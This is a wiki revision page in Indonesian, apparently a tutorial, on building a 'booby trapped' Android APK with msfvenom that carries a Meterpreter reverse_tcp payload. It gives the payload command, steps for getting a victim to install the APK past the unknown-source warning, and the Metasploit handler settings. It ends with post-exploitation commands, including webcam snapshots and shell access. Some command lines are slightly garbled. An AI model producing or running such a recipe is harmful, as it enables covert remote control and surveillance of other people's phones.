Difference between revisions of "MSF: Dapatkan remote shell android"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| (One intermediate revision by the same user not shown) | |||
| Line 5: | Line 5: | ||
Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan | Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan | ||
| − | sudo | + | sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk |
Masukan IP address Kali Linux & Port-nya. | Masukan IP address Kali Linux & Port-nya. | ||
| − | + | ==Di sisi smartphone== | |
| + | |||
| + | * Copy / kirim file app.apk di Android device. | ||
| + | * Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source". | ||
| − | |||
| Line 26: | Line 28: | ||
set lhost 192.168.1.16 (enter your Kali IP address) | set lhost 192.168.1.16 (enter your Kali IP address) | ||
set lport 4444 | set lport 4444 | ||
| + | exploit1 | ||
| − | + | ==Attack== | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | + | sysinfo - informasi tentang device | |
| + | ps - linux / android ps command | ||
| + | webcam_list - list webcam yang ada | ||
| + | webcam_snap - snapshot webcam | ||
| + | shell - kalau membutuhkan shell (untuk device yang sudah di root) | ||
| − | |||
==Referensi== | ==Referensi== | ||
* http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html | * http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html | ||
Latest revision as of 05:54, 1 June 2017
Membuat booby trapped APK file
Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk
Masukan IP address Kali Linux & Port-nya.
Di sisi smartphone
- Copy / kirim file app.apk di Android device.
- Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source".
Di sisi Kali Linux
Di CLI, ketik
msfconsole
Jalankan perintah
user exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.1.16 (enter your Kali IP address) set lport 4444 exploit1
Attack
sysinfo - informasi tentang device ps - linux / android ps command webcam_list - list webcam yang ada webcam_snap - snapshot webcam shell - kalau membutuhkan shell (untuk device yang sudah di root)